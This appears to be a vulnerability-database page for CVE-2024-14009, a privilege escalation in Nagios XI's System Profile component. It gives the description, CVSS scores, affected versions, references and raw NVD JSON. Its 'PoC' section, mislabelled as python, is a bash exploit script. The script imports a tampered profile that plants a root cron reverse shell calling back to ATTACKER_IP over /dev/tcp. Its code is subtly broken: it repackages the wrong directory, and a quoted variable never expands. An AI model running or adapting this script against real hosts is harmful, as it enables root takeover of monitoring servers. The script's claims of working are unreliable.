CVE-2024-14009

Description

Nagios XI versions prior to 2024R1.0.1 contain a privilege escalation vulnerability in the System Profile component. The System Profile feature is an administrative diagnostic/configuration capability. Due to improper access controls and unsafe handling of exported/imported profile data and operations, an authenticated administrator could exploit this vulnerability to execute actions on the underlying XI host outside the application's security scope. Successful exploitation may allow an administrator to obtain root privileges on the XI server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:* - VULNERABLE

Nagios XI < 2024R1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2024-14009 PoC - Nagios XI System Profile Privilege Escalation
# Requirements: Valid Nagios XI administrator credentials

TARGET="http://target-nagios-xi.local"
USERNAME="admin"
PASSWORD="admin_password"
ATTACKER_IP="attacker_ip"
ATTACKER_PORT="4444"

# Step 1: Authenticate and get session cookie
echo "[*] Authenticating to Nagios XI..."
SESSION=$(curl -s -c /tmp/cookies.txt -d "username=$USERNAME&password=$PASSWORD" \
    "$TARGET/nagiosxi/api/v1/authenticate" | jq -r '.token')

if [ "$SESSION" == "null" ] || [ -z "$SESSION" ]; then
    echo "[-] Authentication failed"
    exit 1
fi
echo "[+] Authentication successful"

# Step 2: Export current system profile
echo "[*] Exporting system profile..."
curl -s -b /tmp/cookies.txt \
    "$TARGET/nagiosxi/includes/components/profile/export.php?cmd=download" \
    -o /tmp/original_profile.tar.gz

# Step 3: Extract and modify profile
echo "[*] Extracting and modifying profile..."
tar -xzf /tmp/original_profile.tar.gz -C /tmp/
mkdir -p /tmp/profile_modified

# Inject reverse shell payload into cron
echo '*/1 * * * * root /bin/bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1' \
    >> /tmp/profile_modified/etc/cron.d/nagios_xi_cron

# Step 4: Repackage modified profile
cd /tmp/profile_modified && tar -czf /tmp/modified_profile.tar.gz . && cd -

# Step 5: Import modified profile
echo "[*] Importing modified profile (triggering privilege escalation)..."
curl -s -b /tmp/cookies.txt -X POST \
    -F "profile=@/tmp/modified_profile.tar.gz" \
    "$TARGET/nagiosxi/includes/components/profile/import.php"

echo "[+] Exploit sent. Check listener on port $ATTACKER_PORT"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-14009
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-14009
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-14009/
[4] VulDB https://vuldb.com/cve/CVE-2024-14009
[5] https://www.nagios.com/changelog/nagios-xi/
[6] https://www.nagios.com/products/security/#nagios-xi
[7] https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-system-profile

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-14009", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:46.447", "lastModified": "2025-11-06T18:17:08.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R1.0.1 contain a privilege escalation vulnerability in the System Profile component. The System Profile feature is an administrative diagnostic/configuration capability. Due to improper access controls and unsafe handling of exported/imported profile data and operations, an authenticated administrator could exploit this vulnerability to execute actions on the underlying XI host outside the application's security scope. Successful exploitation may allow an administrator to obtain root privileges on the XI server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#nagios-xi", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-system-profile", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}